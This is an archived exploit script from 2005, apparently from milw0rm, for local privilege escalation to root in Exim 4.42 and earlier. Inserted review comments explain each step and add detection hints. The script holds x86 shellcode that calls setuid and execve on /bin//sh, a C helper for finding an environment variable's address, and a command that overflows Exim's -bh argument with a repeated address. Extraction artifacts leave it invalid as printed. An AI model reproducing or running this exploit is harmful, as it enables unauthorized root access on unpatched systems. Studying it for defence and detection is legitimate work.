1 #!/bin/sh
2
3 # Local Lame R00T sploit for exim <= 4.42
4 # by Dark Eagle
5 #
6 # My First Coding Release In bash ))
7
8 # Unl0ck Research Team
9 #
10 # More Effective than C-code.
11 #
12 # @env.c content:
13 #
14 ###################################################
15 # #include <stdio.h>
16 # #include <string.h>
17 # int main(int argc, char *argv[])
18 # {
19 # char *addr_ptr;
20 # addr_ptr = getenv(argv[1]);
21 # printf("%s @ %p\n", argv[1], addr_ptr);
22 # return 0;
23 # }
24 ###################################################
25
# NOTE(review): proof-of-concept listing kept as published. It carries print/extraction
# artifacts (gutter numbers, typographic punctuation, a wrapped string literal) and is
# not valid shell as printed. The comments describe what each step is meant to do.
#
# Overall flow: build a helper that prints the address of an environment variable,
# export a machine-code payload in CODE, ask the operator to type that address, then
# start ./exim with -bh and an oversized host-address argument built from it.
# The header states exim <= 4.42 is affected, so the remediation is a later release.
# Presumably the exim binary in /usr/exim/bin is setuid root; confirm on the host.

# Compile the helper whose C source is quoted in the header comment; it prints
# getenv(argv[1]) with %p.
26 gcc @env.c −o @env
27
# Copy the helper into /usr/bin (this needs write access to that directory) and
# change to the Exim install directory so ./exim resolves below.
# Defender note: an unexpected /usr/bin/@env file is an artifact of this script.
28 cp @env /usr/bin
29 cd /usr/exim/bin
30
# CODE holds raw x86 bytes emitted by perl: two int 0x80 calls (numbers 0x17 and 0x0b)
# around the pushed string "/bin//sh". On 32-bit Linux those numbers are setuid and
# execve. The literal is wrapped across lines in this listing.
31 CODE=‘perl −e ’print "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69
32
\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"’‘;export CODE
33
# Print where CODE sits in the helper's environment; the operator retypes that value
# at the prompt below.
34 @env CODE
35 echo "So, dude, starting..."
36 echo "NoW Just Type Address Of CODE"
37
# The address is entered by hand and only echoed back; nothing validates it.
38 read ADDRESS
39
40 echo "You are typed: $ADDRESS"
41
42 echo "Leeeeeeeeeeeeet’sssssssssss g000000000000000!!!!!!!!!"
43
# -bh is given "::%A" followed by the typed value packed as a 32-bit word ('L') and
# repeated 256 times.
# NOTE(review): this looks aimed at overrunning a fixed-size buffer while the host
# address is parsed. That is inferred from the repetition, not shown on this page.
# Detection: exim started with -bh and a very long, non-printable argument.
44 ./exim −bh ::%A‘perl −e ’print pack(’L’,’$ADDRESS’) x 256’‘
45
46 # milw0rm.com [2005-02-07]
Exim 4.42 Local Root Exploit
darkeagle
02/07/2005